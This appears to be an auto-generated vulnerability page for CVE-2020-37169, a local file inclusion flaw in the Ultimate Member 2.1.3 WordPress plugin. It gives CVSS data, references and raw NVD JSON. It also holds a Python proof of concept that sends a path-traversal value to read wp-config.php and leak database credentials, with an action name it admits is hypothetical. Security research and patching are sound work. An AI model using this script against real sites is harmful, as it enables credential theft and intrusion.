CVE-2020-37169

Description

WordPress Plugin ultimate-member 2.1.3 contains a local file inclusion vulnerability that allows authenticated attackers to include arbitrary files by manipulating the pack parameter in class-admin-upgrade.php. Attackers can send POST requests with malicious pack values to include unintended PHP files from the packages directory and execute arbitrary code.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Ultimate Member 2.1.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"
# The action triggers the upgrade function in class-admin-upgrade.php
action = "um_do_ajax_upgrade"  # Hypothetical action name based on plugin structure

# Attacker's session cookie (requires authentication, PR:L)
cookies = {
    "wordpress_logged_in_example": "attacker_session_cookie_value"
}

# Malicious payload including a sensitive file using path traversal
# Attempting to include wp-config.php to leak database credentials
payload_data = {
    "action": action,
    "pack": "../../../wp-config.php"
}

try:
    response = requests.post(target_url, data=payload_data, cookies=cookies)

    # Check if the response contains indicators of success (e.g., DB_PASSWORD)
    if response.status_code == 200 and "DB_PASSWORD" in response.text:
        print("[+] Vulnerability exploited successfully!")
        print("[+] Leaked content:")
        print(response.text[:500])  # Print first 500 chars of response
    else:
        print("[-] Exploit failed or target not vulnerable.")
        print(f"Status Code: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"[!] Error connecting to target: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-37169
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-37169
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-37169/
[4] VulDB https://vuldb.com/cve/CVE-2020-37169
[5] https://www.exploit-db.com/exploits/48065
[6] https://www.vulncheck.com/advisories/wordpress-plugin-ultimate-member-local-file-inclusion

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-37169", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:32.747", "lastModified": "2026-05-13T17:07:21.030", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "WordPress Plugin ultimate-member 2.1.3 contains a local file inclusion vulnerability that allows authenticated attackers to include arbitrary files by manipulating the pack parameter in class-admin-upgrade.php. Attackers can send POST requests with malicious pack values to include unintended PHP files from the packages directory and execute arbitrary code."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/48065", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wordpress-plugin-ultimate-member-local-file-inclusion", "source": "[email protected]"}]}}